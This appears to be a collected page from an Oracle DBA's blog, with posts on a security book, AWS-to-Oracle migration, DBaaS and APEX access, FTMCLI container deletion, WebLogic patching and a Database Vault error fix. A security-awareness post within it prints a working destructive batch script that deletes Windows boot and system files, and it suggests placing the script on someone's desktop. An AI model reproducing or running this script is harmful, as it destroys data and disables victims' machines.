Oracle Database Application Security Book

Finally …

The Book is alive

For the first time the book which is dicussed critcal security issues such as database threats, and how to void them, the book also include advance topics about Oracle internet directory, Oracle access manager and how to implement full cycle single sign on,

Focus on the security aspects of designing, building, and maintaining a secure Oracle Database application. Starting with data encryption, you will learn to work with transparent data, back-up, and networks. You will then go through the key principles of audits, where you will get to know more about identity preservation, policies and fine-grained audits. Moving on to virtual private databases, you’ll set up and configure a VPD to work in concert with other security features in Oracle, followed by tips on managing configuration drift, profiles, and default users.

What You Will Learn:- 

  • Work with Oracle Internet Directory using the command-line and the console.
  • Integrate Oracle Access Manager with different applications.
  • Work with the Oracle Identity Manager console and connectors, while creating your own custom one.
  • Troubleshooting issues with OID, OAM, and OID.
  • Dive deep into file system and network security concepts.
  • First time chapter that include most of the critical database threats in real life.

 

You can buy the book now from amazon here

 

Cheers

Osama

Migrating From AWS to Oracle Using SQL Developer

The Data Uploaded to the Cloud Vendor Amazon web services ( AWS ) But the client decided to move their data on-premises for the first sight you will think this is hard and needs  a lot of work but thank you SQL Developer and Jeff Smith and he is the product manage for SQL Developer amazing man by the way and crossfitter  at the same time 😛

However Lets start :-

  •  Open SQL developer
  • Choose Database copy option from tools menu.
  • Select source database should be AWS
    • Provide hostname only for the AWS
    • Listener Port
    • DB Name
    • Username/Password 
    • Test your connection.
  • Select destination database should be Oracle 

  • Provide hostname only for the AWS.
      • Provide hostname/IP for the server.
      • Listener Port
      • DB Name
      • Username/Password 
      • Test your connection.

    • Press Next Button, if the migration done before on the same schema press replace and next.

                                        

    • Press Next after choose what you want to move, Data, Functions , Or trigger … etc
    • Check Proceed to summary and Press the finish button the migration will start after this,  it will take some time depend on internet connection and data size.
    Enjoy the migration
    Osama Mustafa

    Access Dbaas monitor

    To access Oracle DBaaS Monitor when the HTTPS port is unblocked ( i blogged about this before and how to enable it )

    • Open the Oracle Database Cloud Service console, from the console 
    • From the right panel of the services choose Database services monitor and then press on it.
    • New Screen will be opened
      • Username –> dbaas_monitor
      • Password –>  the same password you put it for the Dbaas creation.
    Thank you 
    Osama Mustafa

    Access Apex On the Cloud Using DBaas

    Oracle Database Cloud Service include Oracle Application Express, which you manage using the Oracle Application Express administration console. You access this administration console by going to the Oracle Application Express.

    To access the Apex Application on the cloud;-

    • From the Dbaas you want, press on the tool panel and choose Apex.
    • To use the Apex you need to enable https on your cloud, to do this you have to access to compute services –> network and choose https
    • After doing this you will be able to access to Apex Page enter the following information:-
      • In the Workspace box, enter INTERNAL.
      • In the Username box, enter ADMIN.
      • In the password box, enter your password.
    Enjoy the cloud
    Cheers
    Osama mustafa

    Delete Oracle Storage cloud Container using File Transfer Manager CLI – FTMCLI

    In this post i will show you how to delete the container with all the objects in it, we are using storage container to configure Oracle Cloud backup and store database backup in it, But if you want to delete this container oracle cloud will not allow you to do this because the container should be empty.

    there are different way to do this all of them using command line, the way are :-

    • Web Console — working only if the container is empty.
    • RESTful API
    • Java Library
    • Oracle Storage Cloud File Transfer Manager CLI
    • File Transfer Manager API
    Each one of them having it’s own advantage and disadvantage you can check oracle documentation foe this from here 
    Let’s talk about FTMCLI it’s very simple and easy to use it you should have JRE 7 or later download from here
    and Download FTMCLI From here
    • Now to make it simple as you can when you download put everything in one folder extract them 
    • inside FTMCTL zip file you will see files called ftmcli.properties”, this file allow you to save the storage name and configuration of Storage cloud if you do this it will not necessary to add it each time in the command line i prefer to do this, trying to do it once better to do it each time, the file having different parameters like this :-
      • auth-url :- URL of your Oracle Storage Cloud
      • user :- Your user name.
      • service :- The cloud service name.
      • identity-domain :- The name of your identity domain.
      • storage-class :- default standrad or you can change it to archive
      • max-threads :- The maximum number of threads to be used in a request.
      • retries :-  The number of times that a request must be retried in case of failure.
      • segment-size :- The segment size in MB.
      • segments-container :- The container in which the segments must be stored during the upload process.
                You can get all the information from the console –> Storage cloud –> Details.
    • Now Let’s using the command line on your PC open cmd or ssh depend on your operating system if you having Linux you need to set the export the following Check the documentation here :-
      • export FTM_AUTH_URL
      • export FTM_USER
      • export FTM_SERVICE
      • export FTM_IDOMAIN
    • using this command java.exe -jar ftmcli.jar –help you can see how to use the FTMCLI file.
    • My container on Oracle storage cloud called DBBackup so i want to delete with the below command ;-

    c:\FTMCL\bin>java.exe -jar C:\FTMCL\ftmcli.jar delete -f DBBackup –properties-f
    ile c:\FTMCL\ftmcli.properties

    The output should be like this :-

    Cheers And Enjoy the cloud.
    Osama Mustafa

    Apply Weblogic Patch Offline mode

    1. Shutdown all the services for weblogic.
    2. unzip the patch under $MW_HOME/utils/bsu/cache_dir
    3. run the following command :-

    ./bsu.sh -prod_dir=$weblogic_home  -patch_download_dir=Patch_location -patchlist=patch_id -verbose -install

    The final Result 

    Or you can apply the weblogic patch using smart update

    Thanks
    Osama Mustafa

    Latest Video Upload Part #1

    Recently i was working on some installation and configuration for Fusion and as you see the video uploaded to my channel :-

    1- ODI 11.1.1.9 Installation here
    2- Oracle Enterprise manager 13c installation here
    3- Oracle BI 11.1.1.9 Installation On Linux here
    4- Install Oracle BI Apps 11.1.1.10.1 On Linux here

    Thank
    Osama

    Me, Security & Oracle

    Lot of question came to my mind when I start talking about oracle security, How to secure my databases, what should I do?
    Adding Firewall to my network is it enough? Enable Oracle Audit Parameter will be enough?
    Understand Security as concept is very important to reduce risk of attack and to do that you should make your system is secure.
    Having Security awareness is first step to secure the system.

    According to RSA reports, there was 7% increase in amount of phishing attacks worldwide between months of July and August 2010, The United States currently leads as the country that suffered the most attacks in regards to online cyber threats with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
    The below Graph Show Number of network Security Breaches over Past 12 months (Graph Made by Ponemon Institute)
    Included to above reports 1$ trillion the total value of intellectual property hackers stole from business around the world in 2008.
    As proof for this I will mention three different stories for the biggest top “black hat” hackers
    The below Graph Shown How much Did the Cyber-attack Cost Company over 12 month (Graph Made by Ponemon Institute)
    Jonathan James when he hacked NASA he was 16 years old with that he was the first juvenile sent to the present, Installed backdoor into defense threats reductions agency server and  jacked into NASA Computers stealing software worth 1.7M $ Costing NASA 41,000$ in Repair.
    Adrian Lamo Hacked into NY Times and Microsoft using wifi Coffee shop, Viewed Personal Information and High profile Subject matter
    The last example Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
    Computer Hacking is usually used as stereotypes in movies and cartoons as Guy sitting behind desk with Pepsi Can and not that much luck with ladies , the truth is this guy cost people and companies money and privacy, therefor the hacking effects on individuals , organizations and company.
    As individuals victims of computer hacking will lose their saving, privacy even their life, in the early days of computer the virus was the biggest security risk which is cause data losing. After that it’s replaced with malware which is small software designed to do job such as key logger or virus scanner but now this software not more any fun since the hackers now creating malware.
    Nothing easier today than writing virus just to do annoying things, the below code just an example how writing a virus.
    You can find step to write virus, Trojan or even worm on the internet and for free, this is what makes problem bigger, because internal user can read this information and start using them so you should prepare to all these kind of attacks.
    The below example for simple virus, all you have to do is save as batch file and put it on someone desktop

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini
    msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

     What if the victims was company or organization, the small effect could happened by hacker is put some employees out of works for short period of time. The large affect hacker could stole company secrets and lose them data, and make some damage, the last survey for Ponemon Research on behalf of juniper Networks 90% of companies had been breached at least once by hackers over the past 12 months.60% reported two or more breaches over the past year.

    So companies or organizations should spend small fortune for security purpose software and hardware and lets us don’t forget to educate our employee.
    The Security today consider as most important priority for the company for two reasons:
    1-      Personal Data protections.
    If you store data you should secure these data, since it’s related to customers or clients.
    2-      Social Responsibility. 

    Some of these data very important and contain people privacy which indicate us that company should protect these information by secure their systems.
    When you leave your house for works purpose in the morning or hanging out with friends in the evening you make sure that your house is secure why? All this to keep unauthorized people to access, damage and theft By enable alarm system, make sure your doors is lock and even your windows, this is the same for the companies or organizations same principle but with different approach, the valuable things in the computers and networks is the data you create, this is the first reasons why we have computers and networks. 
    Operating system can be reinstalled, Hardware can be replaced but we talking about data which is unique and sometimes it is irreplaceable.
    Data is confidential and people privacy, this is the main reason why you don’t want lose it, you don’t want others to even view it without authorization , Visa information, mobile numbers, social numbers and account numbers.
    If it’s left unprotected then information can be accessed by anyone, if these information fall into wrong hand, you’re live is nightmare, quite often ensure your data is protected is small price that you could pay to avoid future problems and prevent threats.
    What if the data is not adequately protected, perhaps it compromised which called security breach, I am not talking here as individual level but as Business level that cause problems such as loss of reputation and lawsuits.
    According to the Ponemon institute, cost of a Security breach during 2008 was $202 per record breached. Imagine if you have 1 Million records what is could cause to the company?
    Intruders not care who you are or about your identity they just want to control your computer. By doing this they can hide their location and start attack.
    By access to the system intruders discovers new vulnerabilities to exploit in computer software, don’t forget its networks which mean you can access to another computers on same network Complex right?
    But what about the law, all the above information is just reports and security principle, check the below law that talks about security and data privacy.
    Cheers
    Osama Mustafa

    ORA-47401: Realm violation for CREATE TABLE on SYSTEM.SYS_EXPORT_SCHEMA_07

    When trying to export any user using system the below error appeared

    Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 – 64bit Production
    With the Partitioning, Real Application Clusters, Automatic Storage Management, Oracle Label Security,
    OLAP, Data Mining, Oracle Database Vault and Real Application Testing optio
    ORA-31626: job does not exist
    ORA-31633: unable to create master table “SYSTEM.SYS_EXPORT_SCHEMA_07”
    ORA-06512: at “SYS.DBMS_SYS_ERROR”, line 95
    ORA-06512: at “SYS.KUPV$FT”, line 1020
    ORA-47401: Realm violation for CREATE TABLE on SYSTEM.SYS_EXPORT_SCHEMA_07

    The above error related because the system user is not allow to access data Dictionary files.

    Run the below command
    SQL>
    BEGIN
    DVSYS.DBMS_MACADM.ADD_AUTH_TO_REALM(
    realm_name => ‘Oracle Data Dictionary’,
    grantee => ‘SYSTEM’);
    END;
    /
    PL/SQL procedure successfully completed.

    Or you can use the GUI in Database vault and under Data Dictionray realms add the system user as participant.

    Thank you  

    Jordan Amman Oracle User Group

    It’s almost here, 09/04/2015 I published before about first event for JAOUG, I am so excited, organizing the event not easy needs a lot of work , commitment and dedication. finally we are here.

    Since this is the first event before the biggest one, it’s only introduction for the group and to introduce the local people and let them know about the group.

    We prepare the poster today and seems perfect.

    Thanks for the amazing Volunteer and PSUT to make this dream come true.
    Osama Mustafa